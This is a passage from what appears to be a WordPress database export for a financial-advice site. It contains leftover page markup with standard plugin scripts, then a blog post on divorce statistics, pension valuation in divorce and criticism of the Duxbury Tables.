London</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>&#13;\n		&#13;\n				</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p class=\"phone\">Phone: </p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>&#13;\n		&#13;\n				&#13;\n				</div>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>&#13;\n		</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<div style=\"clear:both;\"/></div>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</article>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<article class=\"col\">\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<div style=\"clear:both;\"/></article>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</section>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</div>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>				&#13;\n&#13;\n				</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<article class=\"col last\"/></footer>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</div>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>&#13;\n	&#13;\n			</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<footer id=\"footer\"/><!-- wrapper --><script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[ jQuery(window).load(function() { jQuery( \'#wooslider-id-1\' ).flexslider2({namespace: \"wooslider-\" , animation: \'fade\', slideshowSpeed: 7000, animationSpeed: 600, slideshow: true, directionNav: true, keyboard: false, mousewheel: false, pausePlay: false, randomize: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: false, touch: true, controlNav: true}); }); ]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\n/* <![CDATA[ */ var _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"}; /* ]]]]><![CDATA[> */\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\n/* <![CDATA[ */ var iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"}; /* ]]]]><![CDATA[> */\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\n/* <![CDATA[ */\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\n/* ]]]]><![CDATA[> */\n]]></script><script src=\"../wp-content/themes/Avada/js/main.js\" type=\"text/javascript\">// <![CDATA[\n<script type=\"text/javascript\" src=\"../wp-content/plugins/js_composer/assets/js/js_composer_front.js\"/></body></p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n</p>\n<p>\n// ]]></script></div>\n</div>\n</div>\n</div>','Financial Planning for Divorcees','','inherit','closed','closed','','65-autosave-v1','','','2018-12-19 10:02:26','2018-12-19 10:02:26','',65,'http://www.equalitywalk.org.uk/65-autosave-v1',0,'revision','',0),(318,1,'2017-09-21 17:24:32','2017-09-21 17:24:32','<div id=\"wrapper\">\r\n<div id=\"main\" class=\"clearfix \">\r\n<div class=\"avada-row\">\r\n<div id=\"content\" class=\"full-width\" style=\"width: 100%;\">\r\n<div id=\"post-8091\" class=\"post-8091 post type-post status-publish format-standard has-post-thumbnail hentry category-pensions category-wealth-management post\">\r\n<div class=\"post-content\">\r\n<div class=\"wpb_row vc_row-fluid\">\r\n<div class=\"vc_span9 wpb_column column_container\">\r\n<div class=\"wpb_wrapper\"><b>“Til Divorce Do Us Part”</b>\r\n<div class=\"wpb_text_column wpb_content_element \">\r\n<div class=\"wpb_wrapper\">\r\nIn February last year the Office for National Statistics released some depressing figures: <span style=\"font-size: 1.17em;\">The ONS estimates that 42% of marriages now end in divorce </span><span style=\"font-size: 1.17em;\">34% of marriages are expected to end in divorce by the 20</span><sup>th</sup><span style=\"font-size: 1.17em;\"><span style=\"font-size: 1.17em;\"> wedding anniversary </span></span>\r\n<span style=\"font-size: 1.17em;\">The greatest chance of divorce is between the 4</span><sup>th</sup><span style=\"font-size: 1.17em;\"> and 8</span><sup>th</sup><span style=\"font-size: 1.17em;\"> wedding anniversaries</span>\r\n\r\n<span style=\"line-height: 1.5em;\"><img class=\"size-medium wp-image-215 alignleft\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/file3251255366828-193x300.jpg\" alt=\"\" width=\"193\" height=\"300\" />In 2017 there were 127,588 divorces in England and Wales: the comparable figure for Scotland (from the Registrar General) was 9,814.</span> The Scottish figure was the lowest for thirty years – so on the face of it the trend may be reversing. Sadly, that is almost certainly <i>not </i>the case.\r\n\r\nIt is widely accepted that the recession means that many couples who wanted to divorce simply couldn’t afford it – in some cases couples are even having to continue living together after they’ve taken the decision to divorce. But with the economy now improving we will almost certainly see an upturn in the divorce statistics.\r\n\r\nNo-one gets married with the intention of splitting up – but as the figures show, all too often a marriage ends with the couple going their separate ways. If the divorce happens at a relatively young age and there are no children involved then it can be a simple process. If that’s the case with you, this <span style=\"color: #0000ff;\"><a href=\"http://www.resolution.org.uk/\"><span style=\"color: #0000ff;\">website could be useful</span></a>.</span>\r\n\r\nHowever, the longer a couple have been together the more complicated divorce proceedings are likely to be – and the more there will be a need for financial planning advice.\r\n\r\nThis is particularly true once pensions are brought into the divorce proceedings – and this trend will only increase with the Government’s drive to make sure that everyone is ultimately enrolled in a workplace pension.\r\n\r\nThe value of a pension – especially if someone is in a public sector pension scheme – can run into hundreds of thousands of pounds and it can outstrip the value of the family home as the main asset a couple own.\r\n\r\n&nbsp;\r\n\r\nIn our experience it is still the case the pensions are all too often not valued properly in divorce proceedings, leading to one of the couple – and it is invariably the wife – being ‘short-changed.’\r\n\r\n&nbsp;\r\n\r\nThe financial calculations involved in divorce proceedings are being further complicated by increasing life expectancy.\r\n\r\n&nbsp;\r\n\r\nTraditionally, solicitors have relied on the Duxbury Tables, particularly where divorce occurs in later life and one partner is to receive a lump sum which is intended to support him or her for the rest of their life.\r\n\r\n&nbsp;\r\n\r\nHowever these tables  were drawn up in 1992 (by Mrs Duxbury’s accountant) and life expectancy has increased significantly since then. Equally importantly, accepted rates of growth on investments have <i>decreased</i> significantly.\r\n\r\n&nbsp;\r\n\r\nWe have some serious doubts regarding these tables, and yet they are still being relied on in many of the divorce cases that we see – often to the significant disadvantage of the wife.\r\n\r\n&nbsp;\r\n\r\nFinancial planning associated with divorce is not going to become any easier – and it’s one of those areas where you need to take action sooner rather than later. And yet it’s difficult – there’s an understandable reluctance to get involved in the minutiae of pensions planning.\r\n\r\n&nbsp;\r\n\r\nAt Equity SMART we understand how difficult a divorce can be. That’s why we give efficient, professional, easy-to-understand advice: we’ll take care of the financial side of the divorce, leaving you free to rebuild your life and look after your family. You’ve enough to worry about, without worrying about money.\r\n\r\n&nbsp;\r\n\r\nIf you feel that you may be heading towards a divorce – or your clients tell you that they may be – then please don’t hesitate to get in touch with us. We’re happy to listen, and to help.\r\n\r\n&nbsp;\r\n\r\nWarmest regards\r\n\r\n&nbsp;\r\n\r\nSam\r\n\r\n&nbsp;\r\n\r\nResources\r\n\r\n&nbsp;\r\n\r\n<a href=\"http://bbc.in/1jvov24\">BBC statistics on divorce</a>\r\n<span style=\"line-height: 1.5em;\"><a href=\"http://bit.ly/1gkdUSh\">ONS stats on divorce\r\n</a></span><a href=\"http://www.familylore.co.uk/2012/09/family-lore-clinic-how-to-do-duxbury\">How to do Duxbury</a>\r\n<a href=\"http://www.wikivorce.com/divorce/Divorce-Advice/Maintenance/193742-Duxbury-lump-sum-to-replace-maintenance-payments\">Wikivorce – debate on Duxbury</a>\r\n<a href=\"http://www.scotsman.com/news/scotland/top-stories/scottish-divorce-rate-down-due-to-economic-climate-1-2162516\">Scotland source divorce rates down</a>:\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class=\"vc_span3 wpb_column column_container\">\r\n\r\n&nbsp;\r\n<div class=\"wpb_wrapper\">\r\n<div class=\"wpb_text_column wpb_content_element \">\r\n\r\n&nbsp;\r\n<div 